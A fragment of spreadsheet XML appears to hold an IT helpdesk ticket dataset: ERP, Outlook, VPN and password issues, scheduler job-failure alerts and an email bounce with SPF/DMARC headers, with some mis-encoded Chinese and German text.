so#35042381 / line item10_x000D_
mm#3366140_x000D_
order qty :1pc_x000D_
delivery plant : plant_317_x000D_
_x000D_
we can see available stock via md04 screen._x000D_
[cid:image002.jpg@01SID_35805.b2550301]_x000D_
_x000D_
but we cannot create delivery note for this item. we got below error message when we manually tried to issue the dnâ€¦(plant_327n)_x000D_
[cid:image004.jpg@01SID_35805.b2550301]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>purchasing issue-pr can't release</t>
  </si>
  <si>
    <t xml:space="preserve">document number 21745726_x000D_
relevant document number (pr#) can't release with "error in process".  no detail log or explanation._x000D_
</t>
  </si>
  <si>
    <t>outlook  -  keine rÃ¼ckmeldung</t>
  </si>
  <si>
    <t xml:space="preserve">outlook_x000D_
i'm not able to log-on to outlook thiw morning._x000D_
i restarted my computer several times without any effort._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">excel is blank when open excel file </t>
  </si>
  <si>
    <t>pwksivmq dbxajims</t>
  </si>
  <si>
    <t>outlookæ— æ³•ç™»é™† ,ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ã€‚</t>
  </si>
  <si>
    <t>eyoqnkjl gakhdebf</t>
  </si>
  <si>
    <t>no accounting documents for #0159146993 &amp; #9047969100</t>
  </si>
  <si>
    <t>there are no accounting documents for billings #0159146993 &amp; #0158070211 , please help!</t>
  </si>
  <si>
    <t xml:space="preserve">excel is blank when open the excel file </t>
  </si>
  <si>
    <t>ç™¾åº¦æœç´¢åŽ-æ–°ç½‘é¡µæ‰“ä¸å¼€</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ktghvuwr.uwtakcmj@gmail.com
hello it
ç™¾åº¦æœç´¢åŽ-æ–°ç½‘é¡µæ‰“ä¸å¼€ï¼Œå¦‚é™„ä»¶æ‰€ç¤ºï¼Œè¯·å¸®å¿™å¤„ç†æˆ–æä¾›ä¸‹è§£å†³æ–¹æ¡ˆã€‚
è°¢è°¢ï¼
ktghvuwr uwtakcmj
sr. application engineer
optimization team
ktghvuwr.uwtakcmj@gmail.com&lt;mailto:ktghvuwr.uwtakcmj@gmail.com&gt;
</t>
  </si>
  <si>
    <t>user uthagtpgc - outlook issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rgtarthi.erjgypa@company.com
hello help.
geetha's outlook is not working at all. system is very slow.
she has logged off and on thrice since morning.
pls look into the attached files for the error message &amp; resolve at the earliest.
</t>
  </si>
  <si>
    <t>anzeigen der bestellÃ¼bersicht im erp netweaver portal nicht mÃ¶glich</t>
  </si>
  <si>
    <t>im erp netweaver portal ist es nicht mehr mÃ¶glich unter dem paramdntyeter "feinnavigation" die bestellÃ¼bersicht aufzurufen._x000D_
siehe angefÃ¼gte screenshots</t>
  </si>
  <si>
    <t>dnjxilqu povreyhq</t>
  </si>
  <si>
    <t>erp t-code error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ohdrnswl.rezuibdt@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please find below error._x000D_
_x000D_
kindly help to resolve this issue on urgent basis._x000D_
_x000D_
[cid:image001.png@01SID_357e1.3c351d40]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>erpç³»ç»Ÿç™»å½•åŽï¼Œé‡‡è´­é¡µé¢æ— æ³•æ˜¾ç¤º"åŽç»­å‡­è¯"ï¼Œè¯·å¤„ç†</t>
  </si>
  <si>
    <t>lszhkxoy blemoyjd</t>
  </si>
  <si>
    <t>error message during route card release</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: phqwmniy.kjucgqom@gmail.com
hello,
while route card release error message appearing  and route card not get printed:
[cid:image003.jpg@01SID_357da.882f8250]
required help in resolving the issue,
[cid:image004.png@01SID_357da.882f8250]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</si>
  <si>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network outage</t>
  </si>
  <si>
    <t xml:space="preserve">network outage
unable to connect both lan and wi fi
india location
contact no:- 
</t>
  </si>
  <si>
    <t>dwafrmth oabwzitv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2110 failed in job_scheduler at: 09/26/2016 00:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2110 failed in job_scheduler at: 09/26/2016 00:05:00</t>
  </si>
  <si>
    <t>erp printing issue</t>
  </si>
  <si>
    <t xml:space="preserve">from: sridthshar herytur 
sent: monday, september 26, 2016 9:23 am
to: erpbasis-support
cc: cedroapx blsktzgq; fdmaluyo tvecikxn; mvfnbces urbckxna1; nawkpdtx gwcvmbhn
subject: erp printing issue
hi all, 
again same problem repeats on erp printing for plant. below printer error issue.
radyhthika : kindly raise the request for same and concern team.
best </t>
  </si>
  <si>
    <t>antigvjx zekluqim</t>
  </si>
  <si>
    <t>network outage: usa vpn router is down since 08:02 pm et on 09/25. no backup</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________08:02 pm et on 09/25______________x000D_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____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______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</si>
  <si>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attendance_tool password not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rsvminjz.tcpqvbae@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
my attendance_tool password is not working. kindly reset the same &amp; give me the new password._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rsvminjz tcpqvbae</t>
  </si>
  <si>
    <t xml:space="preserve"> regarding cell phone model.</t>
  </si>
  <si>
    <t xml:space="preserve">from: gdhyrts muggftyali  
sent: monday, september 26, 2016 8:06 am
to: chefghtyn chnbghyg; nwfodmhc exurcwkm
subject: rad: regarding cell phone model..
hello chefghtyn,
gso will help on this, i am copying to them.
hello gso,
please help on this. 
</t>
  </si>
  <si>
    <t>ç”µè„‘ç³»ç»Ÿå¯åŠ¨è“å±ã€‚</t>
  </si>
  <si>
    <t>ç”µè„‘ç³»ç»Ÿå¯åŠ¨è“å±ã€‚æ°´ä¸å°å¿ƒæ´’åˆ°ç”µè„‘é‡Œé¢ã€‚</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 09/25/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 09/25/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 09/25/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 09/25/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 09/25/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 09/25/2016 23:00:00</t>
  </si>
  <si>
    <t>need to know who the processor is.</t>
  </si>
  <si>
    <t xml:space="preserve">from: kbyivdfz zwutmehy [mailto:kbyivdfz.zwutmehy@gmail.com] _x000D_
sent: monday, september 26, 2016 5:53 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:need to know who the processor is._x000D_
_x000D_
hello,_x000D_
_x000D_
need to know who the processor might be._x000D_
_x000D_
kindly check and let me know who have authority to approve of a0 and a4 _x000D_
_x000D_
internal purchase requisition can not be released, so i cannot issue po._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>kbyivdfz zwutmehy</t>
  </si>
  <si>
    <t xml:space="preserve">reset pw </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yhmzxcia.heszapvl@gmail.com
please help to reset pass word for erp SID_34
user id : hertel
best </t>
  </si>
  <si>
    <t>wireless outage again-taiwan 0926</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 09/25/2016 20:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3186 failed in job_scheduler at: 09/25/2016 20:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2114 failed in job_scheduler at: 09/25/2016 17:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2114 failed in job_scheduler at: 09/25/2016 17:32:00</t>
  </si>
  <si>
    <t>erp account lock</t>
  </si>
  <si>
    <t>lfcwmxap ehodblur</t>
  </si>
  <si>
    <t>it help</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: notwkdgr.zvmesjpt@gmail.com
do you have any idea why i received this message?
katfrthy cighyillo
consultant
notwkdgr.zvmesjpt@gmail.com&lt;mailto:notwkdgr.zvmesjpt@gmail.com&gt;
from: microsoft outlook
sent: sunday, september 25, 2016 4:09 pm
to: notwkdgr zvmesjpt
subject: undeliverable: fw: company ec mfg_tooltion in us
[image removed by sender.]
your message to dhermosi@gmail.com couldn't be delivered.
gmail.com couldn't confirm that your message was sent from a trusted location.
kathleen.cirillo
office 365
dhermosi
action required
recipient
spf validation error
how to fix it
your organization's email admin will have to diagnose and fix your domain's email settings. please forward this message to your email admin.
________________________________
more info for email admins
status code: 550 5.7.23
this error occurs when sender policy framdntyework (spf) validation for the sender's domain fails. if you're the sender's email admin, make sure the spf records for your domain at your domain registrar are set up correctly. office 365 supports only one spf record (a txt record that defines spf) for your domain. include the following domain name: spf.protection.outlook.com. if you have a hybrid configuration (some mailboxes in the cloud, and some mailboxes on premises) or if you're an exchange online protection standalone customer, add the outbound ip address of your on-premises servers to the txt record.
for more information and instructions about configuring spf records see customize an spf record to validate outbound mail sent from your domain&lt;#bkmk_spfrecords&gt;.
original message details
created date:
9/25/2016 8:08:51 pm
sender address:
notwkdgr.zvmesjpt@gmail.com
recipient address:
dhermosi@gmail.com
subject:
fw: company ec mfg_tooltion in us
error details
reported error:
550 5.7.23 the message was rejected because of sender policy framdntyework violation -&gt; 550 5.7.1 unauthenticated email from hr_tool.com is not accepted due to domain's;dmarc policy. please contact the administrator of hr_tool.com domain if;this was a legitimate mail. please visit; 
dsn generated by:
dm5pr05mb2985.namprd05.prod.outlook.com
remote server:
mx.google.com
message hops
hop
time (utc)
from
to
with
relay time
1
9/25/2016
8:08:52 pm
dm5pr05mb2986.namprd05.prod.outlook.com
dm5pr05mb2986.namprd05.prod.outlook.com
mapi
1 sec
2
9/25/2016
8:08:52 pm
dm5pr05mb2986.namprd05.prod.outlook.com
dm5pr05mb2985.namprd05.prod.outlook.com
microsoft smtp server (version=tls1_2, cipher=tls_ecdhe_rsa_with_aes_256_cbc_sha384_p384)
*
original message headers
dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=company.com;
 s=selector1; h=from:date:subject:message-id:content-type:mime-version;
 bh=p2khj+cx28ii4sgrkpfsbsxqqzvxrpkmbumy6bgcvme=;
 b=sv2v6uxr4jlaemyl32oakf6q2tpv80vdn3wyalrvmwpvlt0ih4leelrpzts6atf863lwqaiwmpjkyor/nks/b+3ricx0tqctyws3prvdutl1to1ghty3be75w2bfc12uvw0mapgzzbtnqsozevisyen3o2tqkq1mumxccbhz85m=
received: from dm5pr05mb2986.namprd05.prod.outlook.com (10.168.176.150) by
 dm5pr05mb2985.namprd05.prod.outlook.com (10.168.176.149) with microsoft smtp
 server (version=tls1_2, cipher=tls_ecdhe_rsa_with_aes_256_cbc_sha384_p384) id
 15.1.649.6; sun, 25 sep 2016 20:08:52 +0000
received: from dm5pr05mb2986.namprd05.prod.outlook.com ([10.168.176.150]) by
 dm5pr05mb2986.namprd05.prod.outlook.com ([10.168.176.150]) with mapi id
 15.01.0649.011; sun, 25 sep 2016 20:08:52 +0000
from: "favot, jean-jacques" &lt;jean-jacques.favot@hr_tool.com&gt;
to: "dhermosi@gmail.com" &lt;dhermosi@gmail.com&gt;
subject: fw: company ec mfg_tooltion in us
thread-topic: company ec mfg_tooltion in us
thread-index: adiu0k1lhl+ozbuesgkwoqwhf5sr3waakvcg
sender: notwkdgr zvmesjpt &lt;notwkdgr.zvmesjpt@gmail.com&gt;
date: sun, 25 sep 2016 20:08:51 +0000
message-id: &lt;dm5pr05mb29862fd8edab0c9b7115e87aefca0@dm5pr05mb2986.namprd05.prod.outlook.com&gt;
references: &lt;dm5pr05mb2986c91ed54f6510f97f2eb3efc90@dm5pr05mb2986.namprd05.prod.outlook.com&gt;
in-reply-to: &lt;dm5pr05mb2986c91ed54f6510f97f2eb3efc90@dm5pr05mb2986.namprd05.prod.outlook.com&gt;
accept-language: en-us
content-language: en-us
x-ms-has-attach: yes
x-ms-tnef-correlator:
authentication-results: spf=none (sender ip is )
 smtp.mailfrom=notwkdgr.zvmesjpt@gmail.com;
x-ms-exchange-messagesentrepresentingtype: 2
x-ms-exchange-meetingforward-message: forward
x-originating-ip: [24.74.132.83]
x-ms-office365-filtering-correlation-id: 32e76e86-fb83-4c95-b8c1-08d3e57fc557
x-microsoft-exchange-diagnostics:
        1;dm5pr05mb2985;6:6zwkfzfqhveyrfplvnz0nkjsmck9qwehil1qgumjnxnqprprqkdhi+rvjj3uc2nejqa0fzgtz4jij+acwuv88puzdunk0hjwjqwvmyqk4t6qt0f+so8tovjk6vrsw4nbmikos5ta5pagfw3tlikizopxoin40z46el9nwzgqwxh2dfht+kz7mql5a3+pajmwsrgslv94qwosb/+oqmwgxvfmlsw+z406vgi7xwkSID_61qzzitpqy4lu86dri3ottgk1xzayeeyzavg6eudngmojgvhdtnqwuio1j8ybnp/xet+hr9grz1ft1y57dsb/hkcy3iuez7slc3yb86gt2/5nrs2wzh90jzgmtanpptqedo=;5:5vw9vc14yq2yep5u2pocqfthezol3pfhxzkwojpdnpwkzpomtdksxjgwu6zrcjk/gbfmvjr3q8g1gvlyai7kcekgjrnwpozuhpv6erkfxyf08+b2xt3nfjd7vsr0kxcifcv61ddkrkgwwnfnaklxdg==;24:cheincs2ucpegyhr2jxtdz4i0u4emaklov/7pefvrpt+qnxldyya8iuersial1s+rrranhcq2jepzug8qvggjsdvnk4ibmjw05qnt0jhj0s=;7:8x23g2habfqwviwctkdxqupnpbikhjtjiylmevfzllvnwoggkaenkvbsoltry7j36exff+7prcp9ejfgu+hih0ognmjetr0okkpaemfapugfinxzgn03bwwvkifmzcsfrcsre3wvfocm4gqhn2l/vh+uow9qrijelr+yuhm5lbonhp/mlumfit4atgzwedr8/orp9a7e4nclbrvinpcrdn3f3pzm+xfd7qqr3s1poembzawfucemmdkg8tt6f5znyd3bdftagjq+czljtqjboyohmsd9kaw/yj9guwxlcemjtijzkysxvmp7dwujtas+
x-microsoft-antispam: uriscan:;bcl:0;pcl:0;ruleid:;srvr:dm5pr05mb2985;
x-microsoft-antispam-prvs: &lt;dm5pr05mb2985cd25ac255f59cd58b973efca0@dm5pr05mb2985.namprd05.prod.outlook.com&gt;
x-exchange-antispam-report-uacyltoe hxgaycze: uriscan:(141303121974841)(21748063052155);
x-exchange-antispam-report-cfa-uacyltoe hxgaycze: bcl:0;pcl:0;ruleid:(213526432)(7151287)(601004)(3512158)(6116117)(9232612157)(4113112)(10201501046)(7166137);srvr:dm5pr05mb2985;bcl:0;pcl:0;ruleid:;srvr:dm5pr05mb2985;
x-forefront-prvs: 0076f48c8a
x-forefront-antispam-report: sfv:nspm;sfs:(21120131)(7110112)(8027113)(488565114)(189002)(199003)(3584113)(3011211112)(7027110)(3061211113)(53993117)(88107116)(5002640100001)(15975445007)(2522112)(87687112)(0797113)(233667113)(212527112)(08847115)(218997113)(3017113)(6751811112)(44767113)(561211112)(79847118)(213947114)(9047113)(290009112)(19580405001)(85427113)(77177112)(586003)(4957113)(11100500001)(92277117)(92267125)(6901211112)(8847113)(2841811114)(00397113)(221247114)(416056116)(03677113)(10400500002)(3612114)(217467112)(98047112)(216697113)(87287000)(3462112)(00047112)(65467000)(9787113)(6771411112)(4771811112)(4391811113)(19580395003)(7227113)(61097000)(8707115);dir:out;sfp:1102;scl:1;srvr:dm5pr05mb2985;h:dm5pr05mb2986.namprd05.prod.outlook.com;fpr:;spf:none;ptr:infonorecords;mx:1;a:1;lang:;
received-spf: none (protection.outlook.com: company.com does not designate
 permitted sender hosts)
spamdiagnosticoutput: 1:99
spamdiagnosticmetadata: nspm
content-type: multipart/mixed;
        boundary="_006_dm5pr05mb29862fd8edab0c9b7115e87aefca0dm5pr05mb2986namp_"
mime-version: 1.0
x-originatororg: company.com
x-ms-exchange-crosstenant-originalarrivaltime: 25 sep 2016 20:08:51.7604
 (utc)
x-ms-exchange-crosstenant-fromentityheader: hosted
x-ms-exchange-crosstenant-id: e7ee4711-c0b1-4311-b500-b80d89e5b298
x-ms-exchange-transport-crosstenantheadersstamped: dm5pr05mb2985
</t>
  </si>
  <si>
    <t>notwkdgr zvmesjpt</t>
  </si>
  <si>
    <t xml:space="preserve"> eagsm657 : the service (security_tool password manager) is stopped or disabled or is not installed on the target machine</t>
  </si>
  <si>
    <t>account locked , unable to login to ess portal</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1429 failed in job_scheduler at: 09/25/2016 11:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1429 failed in job_scheduler at: 09/25/2016 11:44:00</t>
  </si>
  <si>
    <t>lv23 not printing</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1420 failed in job_scheduler at: 09/25/2016 10:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1420 failed in job_scheduler at: 09/25/2016 10:36:00</t>
  </si>
  <si>
    <t>ms crm configuration in outlook</t>
  </si>
  <si>
    <t>bjeacoiy ufaqhlog</t>
  </si>
  <si>
    <t>sound coming from computer while connecting any device or moving monitor.</t>
  </si>
  <si>
    <t>kexcsbgw lzabjxwf</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_6_regen failed in job_scheduler at: 09/25/2016 08:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_6_regen failed in job_scheduler at: 09/25/2016 08:57:00</t>
  </si>
  <si>
    <t>sound issue : 7350</t>
  </si>
  <si>
    <t>summary:issue with the sound of the laptop .there's no sound .</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1343 failed in job_scheduler at: 09/25/2016 07:49:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1343 failed in job_scheduler at: 09/25/2016 07:49:00</t>
  </si>
  <si>
    <t>markhtyingre email as junk</t>
  </si>
  <si>
    <t xml:space="preserve">hello all_x000D_
how are you doing?_x000D_
_x000D_
please can you put this email in general junk?_x000D_
_x000D_
it's a spam ...._x000D_
thx_x000D_
gergryth_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job co_val_update_crosscomp failed in job_scheduler at: 09/25/2016 05:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job co_val_update_crosscomp failed in job_scheduler at: 09/25/2016 05:55:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/25/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/25/2016 01:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 09/25/2016 01:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 09/25/2016 01:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 09/25/2016 00:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 09/25/2016 00:46:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/25/2016 00:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/25/2016 00:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 09/24/2016 23:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 09/24/2016 23:45:00</t>
  </si>
  <si>
    <t xml:space="preserve"> application "plm scheduled tasks monitor"  in a critical state for the below mentioned serevrs.</t>
  </si>
  <si>
    <t xml:space="preserve">alwaysupservice.exe for plm conversion server -  on HostName_108 
plm conversion server on HostName_107
plm conversion server on HostName_520
plm conversion server on HostName_521
</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for dcaokyph.vrdnocxs@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: sunday, september 25, 2016 2:04 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: request to reset microsoft online services password for dcaokyph.vrdnocxs@gmail.com
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ dcaokyph.vrdnocxs@gmail.com 
â€¢ first name: allert 
â€¢ last name: herghan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</si>
  <si>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dcaokyph vrdnocxs</t>
  </si>
  <si>
    <t>inquiry on erp status- unable to access ess portal</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_444 failed in job_scheduler at: 09/24/2016 19:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_444 failed in job_scheduler at: 09/24/2016 19:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_powder_prod_full failed in job_scheduler at: 09/24/2016 18:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_powder_prod_full failed in job_scheduler at: 09/24/2016 18:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56hoti failed in job_scheduler at: 09/24/2016 18:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56hoti failed in job_scheduler at: 09/24/2016 18:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38hoti failed in job_scheduler at: 09/24/2016 17:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38hoti failed in job_scheduler at: 09/24/2016 17:02:00</t>
  </si>
  <si>
    <t>vip 2--workflow notifications in  universal worklist.</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 - ticket
received from: dxyvfuhr.uyfqgomx@gmail.com
all, having reviewed this with joothyst and clrgtydia, the problem is not caused by the exclusion list, or the cm workflow.
the problem is because of a security configuration, where joftgost receives items in the universal worklist, but no e-mail notification.
we traced this to screen su01d, where in the screenshot attached to this incident, you will see the e-mail address for joftgost is incorrectly "joftgost.berfkting@company.com".
please update this to "dxyvfuhr.uyfqgomx@gmail.com".
dear madam, sir, i am no longer receiving workflow notifications to my outlook inbox, how can i restore these?
with kind </t>
  </si>
  <si>
    <t>dxyvfuhr uyfqgomx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 09/24/2016 14:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 09/24/2016 14:10:00</t>
  </si>
  <si>
    <t xml:space="preserve">ms crmdynamics deployment query </t>
  </si>
  <si>
    <t xml:space="preserve">ms crm dynamics deployment query. </t>
  </si>
  <si>
    <t>uacyltoe hxgaycze message email.</t>
  </si>
  <si>
    <t xml:space="preserve">from: efbwiadp dicafxhv 
sent: saturday, september 24, 2016 10:19 pm
to: shesyhur posrt
subject: inc1554560 : uacyltoe hxgaycze message
hello shesyhur,
i have just checked, this issue was reported previously.
after the upgrade users are getting email about uacyltoe hxgayczeing email configuration- please be aware that this is only part of the upgrade and can be safely deleted.
</t>
  </si>
  <si>
    <t>yahoo, emails skype team viewer not loading ; internet not working.</t>
  </si>
  <si>
    <t>yahoo, emails skype team viewer not loading ; internet not working .</t>
  </si>
  <si>
    <t>deaokmqp oruitnmx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1429 failed in job_scheduler at: 09/24/2016 10:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1429 failed in job_scheduler at: 09/24/2016 10:41:00</t>
  </si>
  <si>
    <t xml:space="preserve"> uacyltoe hxgaycze email sent from neerthyu agrtywal id but neerthyu has not sent any such uacyltoe hxgaycze email . advise.</t>
  </si>
  <si>
    <t xml:space="preserve">from: neerthyu agrtywal _x000D_
sent: saturday, september 24, 2016 5:49 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: fw: uacyltoe hxgaycze message_x000D_
importance: low_x000D_
_x000D_
hi,_x000D_
_x000D_
i received this email which shows that it has been sent from my id where as i have not sent any such uacyltoe hxgaycze email. pl. look into this matheywter and advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>sound issue : 7350 issue</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2040 failed in job_scheduler at: 09/24/2016 07:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2040 failed in job_scheduler at: 09/24/2016 07:29:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1320 failed in job_scheduler at: 09/24/2016 06:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1320 failed in job_scheduler at: 09/24/2016 06:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">erp log on balancing error : vpn issue </t>
  </si>
  <si>
    <t>the plant has had our n network drive deleted from all computers and we are unable to work.</t>
  </si>
  <si>
    <t xml:space="preserve"> is there anyway you can add our n network drives back to all computers or send instructions on how to add to each computer?</t>
  </si>
  <si>
    <t>zqpyrxsn zihmunyb</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 09/24/2016 02:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 09/24/2016 02:59:00</t>
  </si>
  <si>
    <t>pls help - unable to connect vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vxhyftae.tbkyfdli@gmail.com_x000D_
_x000D_
hello ,_x000D_
please helo for subject matheywter . pls see below snapshot_x000D_
[cid:image003.jpg@01SID_3565c.102ad310]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vxhyftae tbkyfdli</t>
  </si>
  <si>
    <t xml:space="preserve">job apo_cif_pSID_74_ap failed in job_scheduler at: 09/24/2016 02:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job apo_cif_pSID_74_ap failed in job_scheduler at: 09/24/2016 02:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job apo_cif_pds3_am failed in job_scheduler at: 09/24/2016 02:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job apo_cif_pds3_am failed in job_scheduler at: 09/24/2016 02:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job apo_cif_pds1_am failed in job_scheduler at: 09/24/2016 02:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job apo_cif_pds1_am failed in job_scheduler at: 09/24/2016 02:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job apo_cif_pds3_eu failed in job_scheduler at: 09/24/2016 02:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job apo_cif_pds3_eu failed in job_scheduler at: 09/24/2016 02:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_infonet1_full failed in job_scheduler at: 09/24/2016 01:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_infonet1_full failed in job_scheduler at: 09/24/2016 01:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/24/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/24/2016 01:15:00</t>
  </si>
  <si>
    <t>unable to access engineering_tool due to vpn</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56filesys failed in job_scheduler at: 09/23/2016 22:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 09/23/2016 22:17:00</t>
  </si>
  <si>
    <t>not able to login to vpn,</t>
  </si>
  <si>
    <t>not able to login to vpn,_x000D_
-advised the caller to restart the system and check the internet connection._x000D_
-advised the caller to logon to the company vpn._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>urgent help required- outlook to crm mfg_tooltion issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jhxwiply.midhcnze@gmail.com
not sure why or how but this error came up several times while attempting to add an email to crm
[cid:image001.png@01SID_355c1.93def6a0]
at the bottom of this email it shows it added the email to crm but i cannot find it anywhere
[cid:image004.png@01SID_355c3.16264ae0]
when i click on the 'view in crm' i get below error
[cid:image005.png@01SID_355c3.16264ae0]
